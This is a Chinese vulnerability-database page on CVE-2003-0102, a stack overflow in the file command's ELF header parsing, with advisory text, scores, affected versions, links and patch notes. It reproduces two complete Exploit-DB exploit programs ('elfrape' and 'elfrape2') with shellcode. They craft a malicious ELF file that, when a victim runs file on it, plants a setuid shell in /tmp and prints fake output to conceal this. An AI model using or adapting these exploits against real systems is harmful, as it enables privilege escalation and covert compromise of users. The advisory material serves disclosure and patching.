CVE-2003-0102
CVSS4.6
发布时间 :2003-03-18 00:00:00
修订时间 :2016-10-17 22:29:32
NMCOES    

[原文]Buffer overflow in tryelf() in readelf.c of the file command allows attackers to execute arbitrary code as the user running file, possibly via a large entity size value in an ELF header (elfhdr.e_shentsize).


[CNNVD]file工具本地缓冲区溢出漏洞(CNNVD-200303-058)

        
        file(1)是一款查看文件类型的工具。
        file(1)命令存在一个缓冲区溢出漏洞,本地攻击者可以利用这个漏洞以执行用户权限在系统上执行任意指令。
        问题存在于readelf.c中的587行tryelf()函数的doshn()调用中:
        doshn(class, swap,
        fd,
        getu32(swap, elfhdr.e_shoff),
        getu16(swap, elfhdr.e_shnum),
        getu16(swap, elfhdr.e_shentsize));
        doshn() 'elfhdr.e_shentsize'最后一个参数将在之后用于readelf.c 133行的read()函数中:
        if (read(fd, sh_addr, size) == -1)
        read()调用会拷贝'size'字节到readelf.c 92行定义的'sh_addr'变量中:
        #define sh_addr (class == ELFCLASS32 \
         ? (void *) &sh32 \
         : (void *) &sh64)
        用于read()函数的缓冲区大小只有0x20 (32)字节,通过提供0x28 (40)字节的'size'参数可导致覆盖堆栈中的EBP和EIP寄存器而以其他用户权限执行任意代码。
        用户可以构建恶意文件诱使其他用户来分析,导致发生缓冲区溢出,而以执行用户权限执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:file:file:3.30
cpe:/a:file:file:3.32
cpe:/a:file:file:3.33
cpe:/a:file:file:3.40
cpe:/a:file:file:3.28
cpe:/a:file:file:3.39
cpe:/a:file:file:3.34
cpe:/a:file:file:3.35
cpe:/a:file:file:3.36
cpe:/o:netbsd:netbsd:1.5.1NetBSD 1.5.1
cpe:/a:file:file:3.37
cpe:/o:netbsd:netbsd:1.5.3NetBSD 1.5.3
cpe:/o:netbsd:netbsd:1.5.2NetBSD 1.5.2
cpe:/o:netbsd:netbsd:1.6NetBSD 1.6
cpe:/o:netbsd:netbsd:1.5NetBSD 1.5

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0102
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0102
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-058
(官方数据源) CNNVD

- 其它链接及资源

ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2003-003.txt.asc
(UNKNOWN)  NETBSD  NetBSD-SA2003-003
http://lwn.net/Alerts/34908/
(UNKNOWN)  IMMUNIX  IMNX-2003-7+-012-01
http://marc.info/?l=bugtraq&m=104680706201721&w=2
(UNKNOWN)  BUGTRAQ  20030304 iDEFENSE Security Advisory 03.04.03: Locally Exploitable Buffer Overflow in file(1)
http://www.debian.org/security/2003/dsa-260
(UNKNOWN)  DEBIAN  DSA-260
http://www.idefense.com/advisory/03.04.03.txt
(VENDOR_ADVISORY)  MISC  http://www.idefense.com/advisory/03.04.03.txt
http://www.kb.cert.org/vuls/id/611865
(UNKNOWN)  CERT-VN  VU#611865
http://www.mandrakesoft.com/security/advisories?name=MDKSA-2003:030
(UNKNOWN)  MANDRAKE  MDKSA-2003:030
http://www.novell.com/linux/security/advisories/2003_017_file.html
(UNKNOWN)  SUSE  SuSE-SA:2003:017
http://www.redhat.com/support/errata/RHSA-2003-086.html
(UNKNOWN)  REDHAT  RHSA-2003:086
http://www.redhat.com/support/errata/RHSA-2003-087.html
(UNKNOWN)  REDHAT  RHSA-2003:087
http://www.securityfocus.com/bid/7008
(VENDOR_ADVISORY)  BID  7008
http://xforce.iss.net/xforce/xfdb/11469
(UNKNOWN)  XF  file-afctr-read-bo(11469)

- 漏洞信息

file工具本地缓冲区溢出漏洞
中危 边界条件错误
2003-03-18 00:00:00 2005-05-13 00:00:00
本地  
        
        file(1)是一款查看文件类型的工具。
        file(1)命令存在一个缓冲区溢出漏洞,本地攻击者可以利用这个漏洞以执行用户权限在系统上执行任意指令。
        问题存在于readelf.c中的587行tryelf()函数的doshn()调用中:
        doshn(class, swap,
        fd,
        getu32(swap, elfhdr.e_shoff),
        getu16(swap, elfhdr.e_shnum),
        getu16(swap, elfhdr.e_shentsize));
        doshn() 'elfhdr.e_shentsize'最后一个参数将在之后用于readelf.c 133行的read()函数中:
        if (read(fd, sh_addr, size) == -1)
        read()调用会拷贝'size'字节到readelf.c 92行定义的'sh_addr'变量中:
        #define sh_addr (class == ELFCLASS32 \
         ? (void *) &sh32 \
         : (void *) &sh64)
        用于read()函数的缓冲区大小只有0x20 (32)字节,通过提供0x28 (40)字节的'size'参数可导致覆盖堆栈中的EBP和EIP寄存器而以其他用户权限执行任意代码。
        用户可以构建恶意文件诱使其他用户来分析,导致发生缓冲区溢出,而以执行用户权限执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Christos Zoulas
        ---------------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        ftp://ftp.astron.com/pub/file/file-3.41.tar.gz

- 漏洞信息 (22324)

File 3.x Local Stack Overflow Code Execution Vulnerability (1) (EDBID:22324)
unix local
2003-03-04 Verified
0 lem0n
N/A [点击下载]
source: http://www.securityfocus.com/bid/7008/info

It has been reported that a stack overflow exists in the file program. Although details of this issue are currently unavailable, it is likely that this issue could be exploited to execute code as the user invoking file. 

/*
** elfrape BY lem0n (lem0nxx@hotmail.com)
** a glorified stack overflow in file<=3.39 
**
** "lame code for a lame bug"
**
** this bug was discovered by iDEFENSE retards
** (actually i discovered it and they bought it from 
** me for $8, all that it is really worth)
**
** this code is mainly proof of concept and it has very little use
** "in the wild" unless your sysadmins and friends are morons.
**
** specify a valid elf binary, and elfrape will patch it so that
** it will exploit a stack overflow in file<=3.39.  this exploit
** relies on the victim user (possibly root, but not required) to
** run file <patchedbinary>.
**
** a glorified stack overflow in file<=3.39
** 
** file-3.37/readelf.c:tryelf()
**   doshn(class, swap,
**         fd,
**         getu32(swap, elfhdr.e_shoff),
**         getu16(swap, elfhdr.e_shnum),
**         getu16(swap, elfhdr.e_shentsize));
**
** note that we can manipulate elfhdr. 
** in doshn() we find a very bad thing...
**
** file-3.37/readelf.c:doshn()
**  if (read(fd, sh_addr, size) == -1)
**
** now, fd is the file its processing, sh_addr is the address of a 32 byte char.  
** size is the value read from the header (elfhdr.e_shentsize).  So we make 
** e_shentsize bigger then it should and voila, we got eip pretty easily.  
** the shellcode cant easily be placed after the address however because file is very 
** sensitive about its fd and the loop variable num being overwritten (it will either
** complain about bad fd and exit or hang in the loop). trying to preserve the values of
** each seemed stupid, so i found the best spot for
** the shellcode placement was in the beginning of the file, after the elf header
** because in the beginning of processing, file reads HOWMANY bytes from the start of the
** file onto the stack.
**     
** #define HOWMANY 16384
**
** that makes for a pretty large landing pad, pop a few thousand nops in there
** and this should be a pretty reliable method.
**
** the shellcode also makes sure to output a seemingly genuine result, which will
** always be filename: data
**
** (16:11)[lem0n@keystone:~/audit/file]$cp /bin/sln sln
** (16:11)[lem0n@keystone:~/audit/file]$./elfrape -t 0 -f sln
**  elfrape file<=3.39 priveledge escalation exploit (by lem0n (lem0nxx@hotmail.com)
**   [patching sln, trying to hit 0xbfffbab0]
**   [setting section header size to trigger overwrite (0x32 bytes)]
**   [setting section header entries to 1 to avoid a big mess on the stack]
**   [writing new header to file]
**   [writing target address to file @offset 0x5f4f0]
**   [filling file with nops and shell code @offset 0x34]
**   [exploit done]
** after someone runs 'file sln', execute /tmp/.sh
** (16:11)[lem0n@keystone:~/audit/file]$cp sln /tmp/whatami
** (16:11)[lem0n@keystone:~/audit/file]$echo and now we wait...
**
** typical sp offsets for -o mode are from -2000 to -6000 
** 
** Will create a 6755 /bin/.sh :>
** 
** Note: may not work if used on files less than 8k or so.
*/
#include <stdio.h>
#include <fcntl.h>
#include <sys/types.h>
#include <errno.h>
#include <string.h>
#define MAX_FILENAME 17/* the longest filename i suggest you use */
#define SHELL "/bin/ash"/* a shell that doesnt do seteuid(getuid()); ash,ksh,zsh,etc */
#define LANDING_SIZE 8192/* pretty big considering its just nops and shellcode */
/* shellcode shamelessly stolen (from ?) and modified */
char shellcode[] =
  "\x31\xc0\x31\xdb\x31"
  "\xd2"
  "\x68" "\x00\x00\x00\x00"
  "\x68" "\x00\x00\x00\x00"
  "\x68" "\x00\x00\x00\x00"
  "\x68" "\x00\x00\x00\x00"
  "\x68" "\x00\x00\x00\x00"
  "\x68" "\x00\x00\x00\x00"
  "\x68" "\x00\x00\x00\x00"
  "\x89\xe1\xb2\x20\x43\xb0\x04\xcd\x80\x31\xc0"
  "\xeb\x31\x5e\x89\x76\xac\x8d\x5e\x08\x89\x5e\xb0"
  "\x8d\x5e\x0b\x89\x5e\xb4\x31\xc0\x88\x46\x07\x88"
  "\x46\x0a\x88\x46\xab\x89\x46\xb8\xb0\x0b\x89\xf3"
  "\x8d\x4e\xac\x8d\x56\xb8\xcd\x80\x31\xdb\x89\xd8"
  "\x40\xcd\x80\xe8\xca\xff\xff\xff/bin/sh -c "
  "/bin/cp " SHELL " /tmp/.sh;chmod 6755 /tmp/.sh";
#define EI_NIDENT     16
typedef unsigned short int Elf32_Half;
typedef unsigned long int Elf32_Word;
typedef unsigned long int Elf32_Addr;
typedef unsigned long int Elf32_Off;
typedef struct
{
  unsigned char e_ident[EI_NIDENT];
  Elf32_Half e_type;
  Elf32_Half e_machine;
  Elf32_Word e_version;
  Elf32_Addr e_entry;
  Elf32_Off e_phoff;
  Elf32_Off e_shoff;
  Elf32_Word e_flags;
  Elf32_Half e_ehsize;
  Elf32_Half e_phentsize;
  Elf32_Half e_phnum;
  Elf32_Half e_shentsize;
  Elf32_Half e_shnum;
  Elf32_Half e_shtrndx;
}
Elf32_Ehdr;
struct targets
{
  int target;
  char *description;
  Elf32_Half e_shentsize;
  Elf32_Off e_shoff_delta;
  unsigned long int addr;
};
struct targets targets[] = {
  {0, "Slackware 8.1 (file-3.37-3.1)", 50, 44, 0xbfffc19c},
  {1, "Red Hat Linux release 7.2 (Enigma) (file-3.35)", 80, 76, 0xbfffc19c},
  {2, "Red Hat Linux release 6.2 (Zoot) (file-3.28)", 50, 44, 0xbfffc19c},
  {0, NULL, 0, 0, 0}
};
extern char *optarg;
extern int optind;
void prepare_write_shellcode (char *program);
unsigned long get_sp (void);
void usage (char *argv0);
unsigned long
get_sp (void)
{
  __asm__ ("movl %esp,%eax");
}
int
main (int argc, char *argv[])
{
  int offset, fd, ix, nbytes, c, target = -1;
  unsigned char buff[sizeof (Elf32_Ehdr)];
  unsigned char attack[LANDING_SIZE];
  unsigned char *file = NULL;
  Elf32_Ehdr *ehdr;
  Elf32_Off e_shoff;
  Elf32_Half e_shnum;
  Elf32_Half e_shentsize = 50;
  Elf32_Off e_shoff_delta;
  unsigned long int addr = 1;
  while ((c = getopt (argc, argv, "t:f:o:")) != -1)
    {
      switch (c)
{
case 't':
  target = atoi (optarg);
  break;
case 'f':
  file = (char *) strdup (optarg);
  break;
case 'o':
  addr = 0;
  offset = atoi (optarg);
  break;
default:
  usage (argv[0]);
  break;
}
    }
  printf
    ("elfrape file<=3.39 priveledge escalation exploit (by lem0n (lem0nxx@hotmail.com)\n");
  if (!(file) || ((target == -1) && (addr)))
    usage (argv[0]);
  if (strchr(file,'/'))
   { printf("NO fucking slashes douchebag\n"); exit(-1); }
  
  if (strlen(file) > MAX_FILENAME)
   { printf("Smaller filename please, unless you feel like editing the shell code\n");exit(-1); }
  if (target >= 0)
    {
      if (target >= sizeof (targets) / sizeof (targets[0]) - 1)
{
  fprintf (stderr, "Invalid type\n");
  exit (-1);
}
      e_shentsize = targets[target].e_shentsize;
      e_shoff_delta = targets[target].e_shoff_delta;
      addr = targets[target].addr;
    }
  if ((fd = open (file, O_RDWR)) < 0)
    {
      perror ("open()");
      exit (-1);
    }
  if ((nbytes = read (fd, (char *) buff, sizeof (Elf32_Ehdr))) == -1)
    {
      error ("read failed (%s).\n", strerror (errno));
      exit (-1);
    }
  ehdr = (Elf32_Ehdr *) buff;
  if (addr == 0)
    addr = get_sp () - offset;/* we have a big enough landing point that this addr should work */
  printf ("  [patching %s, tring to hit 0x%x]\n", file, addr);
  printf
    ("  [setting section header size to trigger overwrite (0x%x bytes)]\n",
     e_shentsize);
  ehdr->e_shentsize = e_shentsize;
  printf
    ("  [setting section header entries to 1 to avoid a big mess on the stack]\n");
  ehdr->e_shnum = 1;
/* write the new elf header to the file */
  printf ("  [writing new header to file]\n");
  if (lseek (fd, 0, SEEK_SET) == (off_t) - 1)
    {
      perror ("lseek()");
      exit (-1);
    }
  if (write (fd, buff, sizeof (*ehdr)) == -1)
    {
      perror ("write()");
      exit (-1);
    }
/* seek to where we want our address to wait */
  printf ("  [writing target address to file @offset 0x%x]\n",
  ehdr->e_shoff + e_shoff_delta);
  if (lseek (fd, ehdr->e_shoff + e_shoff_delta, SEEK_SET) == (off_t) - 1)
    {
      perror ("lseek()");
      exit (-1);
    }
  write (fd, &addr, 4);
  memset (attack, 0x90, LANDING_SIZE);
  prepare_write_shellcode (file);
  memcpy (attack + LANDING_SIZE - sizeof (shellcode) - 1, shellcode,
  sizeof (shellcode));
  attack[LANDING_SIZE - 1] = 0x0;
  printf ("  [filling file with nops and shell code @offset 0x%x]\n",
  sizeof (*ehdr));
/* set offset to just after the header, where our code will be */
  if (lseek (fd, sizeof (*ehdr), SEEK_SET) == (off_t) - 1)
    {
      perror ("lseek()");
      exit (-1);
    }
  if (write (fd, attack, LANDING_SIZE) == -1)
    {
      perror ("write()");
      exit (-1);
    }
  printf ("  [exploit done]\n");
  printf ("after someone runs 'file %s', execute /tmp/.sh\n", file);
  close (fd);
  return 0;
}
void
usage (char *argv0)
{
  int ix = 0;
  printf ("Usage: %s -t <target num> -f <existing elf binary filename>\n",
  argv0);
  printf
    ("       %s -o <offset from sp> -f <existing elf binary filename>\n\n",
     argv0);
  while (targets[ix].target || ix == 0)
    {
      printf ("\t#%d: %s\n", targets[ix].target, targets[ix].description);
      ix++;
    }
  exit (-1);
}
/* a quick and dirty hack to let the shellcode have the correct filename */
void
prepare_write_shellcode (char *program)
{
  char *buf;
  int ix;
  char *ptr = shellcode + 37;
  buf = (char *) malloc (strlen (program) + strlen (": data\n"));
  memcpy (buf, program, strlen (program));
  memcpy (buf + strlen (program), ": data\n", 7);
  for (ix = 0; ix < strlen (buf); ix++)
    {
      if (ix && (ix % 4 == 0))
ptr -= 9;
      *ptr = buf[ix];
      ptr++;
    }
  free (buf);
  return;
}
		

- 漏洞信息 (22325)

File 3.x Local Stack Overflow Code Execution Vulnerability (2) (EDBID:22325)
unix local
2003-03-04 Verified
0 lem0nxx
N/A [点击下载]
source: http://www.securityfocus.com/bid/7008/info
 
It has been reported that a stack overflow exists in the file program. Although details of this issue are currently unavailable, it is likely that this issue could be exploited to execute code as the user invoking file. 

/*
** file(1) exploit for *bsd,linux
** does cp /bin/sh /tmp/.sh;chmod 4755 /tmp/.sh and also
** echos the correct filename followed by ": data"
** this one actually works w/o silly targets or offsets
** cmdshellcode by *://lsd-pl.net/
** lem0nxx@hotmail.com
*/
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/types.h>
#include <errno.h>
/* elf stuff */
#define EI_NIDENT       16
#define ET_EXEC         2
#define EM_VPP500       17/* Fujitsu VPP500! */
#define EV_CURRENT      1
#define FILESIZE 16384
typedef unsigned short int Elf32_Half;
typedef unsigned long int Elf32_Word;
typedef unsigned long int Elf32_Addr;
typedef unsigned long int Elf32_Off;
typedef struct
{
  unsigned char e_ident[EI_NIDENT];
  Elf32_Half e_type;
  Elf32_Half e_machine;
  Elf32_Word e_version;
  Elf32_Addr e_entry;
  Elf32_Off e_phoff;
  Elf32_Off e_shoff;
  Elf32_Word e_flags;
  Elf32_Half e_ehsize;
  Elf32_Half e_phentsize;
  Elf32_Half e_phnum;
  Elf32_Half e_shentsize;
  Elf32_Half e_shnum;
  Elf32_Half e_shtrndx;
}
Elf32_Ehdr;
unsigned long
get_sp (void)
{
  __asm__ ("movl %esp,%eax");
}
unsigned char linux_code[] =
  "\xeb\x22\x59\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
  "\xe3\x50\x66\x68\x2d\x63\x89\xe7\x50\x51\x57\x53\x89\xe1\x99\xb0\x0b"
  "\xcd\x80\xe8\xd9\xff\xff\xff";
unsigned char bsd_code[] =
  "\xeb\x25\x59\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
  "\xe3\x50\x66\x68\x2d\x63\x89\xe7\x50\x51\x57\x53\x89\xe7\x50\x57\x53"
  "\x50\xb0\x3b\xcd\x80\xe8\xd6\xff\xff\xff";
unsigned char cmd[] =
  "echo %s: data;/bin/cp /bin/%s /tmp/.sh;chmod 4755 /tmp/.sh";
unsigned char *prepare_code (unsigned char *os_code, unsigned char *filename,
     unsigned char *shell, int *code_len);
int
main (int argc, char *argv[])
{
  unsigned char *final_code, *os_code, *shell, *attackbuff;
  int fd, ix, code_len;
  Elf32_Ehdr *ehdr;
  if (!(attackbuff = (char *) malloc (FILESIZE)))
    {
      fprintf (stderr, "malloc error\n");
      exit (-1);
    }
  ehdr = (Elf32_Ehdr *) attackbuff;
  if (argc < 3)
    {
      fprintf (stderr, "Usage: %s <filename> <bsd|linux>\n", argv[0]);
      exit (-1);
    }
  switch (argv[2][0])
    {
    case 'l':
    case 'L':
      os_code = linux_code;
      if (!(shell = strdup ("ash")))
{
  fprintf (stderr, "strdup error\n");
  exit (-1);
}
      break;
    case 'b':
    case 'B':
      os_code = bsd_code;
      if (!(shell = strdup ("tcsh")))/* does tcsh drop privs tho? ah well */
{
  fprintf (stderr, "strdup error\n");
  exit (-1);
}
      break;
    default:
      fprintf (stderr, "Invalid target os\n");
      exit (-1);
    }
  fprintf (stderr,
   "elfrape2, using cp /bin/%s /tmp/.sh;chmod 4755 /tmp/.sh shellcode\n",
   shell);
  final_code = prepare_code (os_code, argv[1], shell, &code_len);
  fprintf (stderr, "Using %s shellcode, %d bytes for file %s\n",
   argv[2][0] == 'b' ? "BSD" : "LINUX", code_len, argv[1]);
  memset (attackbuff, 0x90, FILESIZE);
  memset (attackbuff, 0x0, sizeof (Elf32_Ehdr));
  memcpy (attackbuff + FILESIZE - code_len, final_code, code_len);
  /* file requires the following shit */
  ehdr->e_ident[0] = 0x7f; /* elf magic shit */
  ehdr->e_ident[1] = 'E';
  ehdr->e_ident[2] = 'L';
  ehdr->e_ident[3] = 'F';
  ehdr->e_ident[4] = 0x01;/* 32 bit objects */
  ehdr->e_ident[5] = 0x01;/* LSB */
  ehdr->e_type = ET_EXEC;/* if you wanna know, go google it */
  ehdr->e_machine = EM_VPP500;
  ehdr->e_version = EV_CURRENT;
  ehdr->e_shoff = sizeof (Elf32_Ehdr);
  ehdr->e_ehsize = sizeof (Elf32_Ehdr);
  ehdr->e_shentsize = 2048;
  ehdr->e_shnum = 0x0001;
  for (ix = 0; ix < 256; ix += 4)
    {
      *(long *) (attackbuff + ehdr->e_ehsize + ix) = get_sp () - 1500;
    }
  if ((fd = open (argv[1], O_WRONLY | O_CREAT | O_TRUNC)) < 0)
    {
      perror ("open()");
      exit (-1);
    }
  if (write (fd, attackbuff, FILESIZE) == -1)
    {
      perror ("write()");
      exit (-1);
    }
  close (fd);
  free (shell);
  free (final_code);
  fprintf (stderr,
   "Use /tmp/.sh to gain the targets uid once they run 'file %s'\n",
   argv[1]);
  fprintf (stderr, "Make sure the shell you copied doesn't drop privs\n");
  return 0;
}
/* this func allows for the shellcode to echo out legit results for file */
unsigned char *
prepare_code (unsigned char *os_code, unsigned char *filename,
      unsigned char *shell, int *len)
{
  unsigned char *complete;
  *len = strlen (os_code);
  *len += strlen (cmd);
  *len += strlen (filename) - 2;
  *len += strlen (shell) - 2;
  if (!(complete = (char *) malloc (*len)))
    {
      fprintf (stderr, "malloc error\n");
      exit (-1);
    }
  memcpy (complete, os_code, strlen (os_code));
  sprintf (complete + strlen (os_code), cmd, filename, shell, shell, shell,
   shell);
  return complete;
}
		

- 漏洞信息

6456
file Command readelf.c tryelf() ELF Header Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-03-04 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

File Utility Local Memory Allocation Vulnerability
Design Error 7009
No Yes
2003-03-04 12:00:00 2009-07-11 08:06:00
Discovery credited to Jeff Johnson.

- 受影响的程序版本

file file 3.40
file file 3.39
+ FreeBSD FreeBSD 5.0
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.0
+ RedHat Linux for iSeries 7.1
+ RedHat Linux for pSeries 7.1
+ Sun Cobalt Qube 3
+ Sun Cobalt RaQ 4
+ Sun Cobalt RaQ 550
+ Sun Cobalt RaQ XTR
+ Sun Linux 5.0.6
+ Sun LX50
file file 3.37
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ RedHat Linux 8.0 i386
+ RedHat Linux 8.0
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
file file 3.36
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
file file 3.35
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i686
+ RedHat Linux 7.2 i586
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.2
+ Trustix Secure Linux 1.5
file file 3.34
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
file file 3.33
+ RedHat Linux 7.1 i686
+ RedHat Linux 7.1 i586
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1
file file 3.32
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 7.2
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
file file 3.30
+ Immunix Immunix OS 7+
+ RedHat Linux 7.0 i686
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0
file file 3.28
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Red Hat Linux 6.2
+ RedHat Linux 6.2 i386
file file 3.41
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1

- 不受影响的程序版本

file file 3.41
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1

- 漏洞讨论

It has been reported that a memory allocation issue exists the file program. Although details of this issue are currently unavailable, it is likely that this issue could be exploited to cause a denial of service condition, and potentially execute code as the user of the file utility.

- 漏洞利用

Exploit contributed by CrZ &lt;crazy_einstein@yahoo.com&gt; and LimpidByte &lt;lbyte.void.ru&gt;:

- 解决方案

Sun have reported that patches to address this issue are pending release. See referenced advisory (Sun Alert ID: 56040) for further detail.

SuSE has released a security advisory (SuSE-SA:2003:017) which contains fixes for this issue. Users are advised to upgrade as soon as possible.

Debian has released a security advisory (DSA-260-1) which contains fixes for this issue. Users are advised to upgrade as soon as possible.

Gentoo Linux users running sys-apps/file may upgrade to file-3.41 with the following commands:

emerge sync
emerge file
emerge clean

Trustix advisory TSL-2003-0006 contains fixes which address this issue. Please see the attached advisory for details on obtaining and applying fixes.

Sun has released a fix for Sun Linux 5.0.6.

Fixes have been made available:


file file 3.28

file file 3.30

file file 3.32

file file 3.33

file file 3.34

file file 3.35

file file 3.36

file file 3.37

file file 3.39

file file 3.40

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站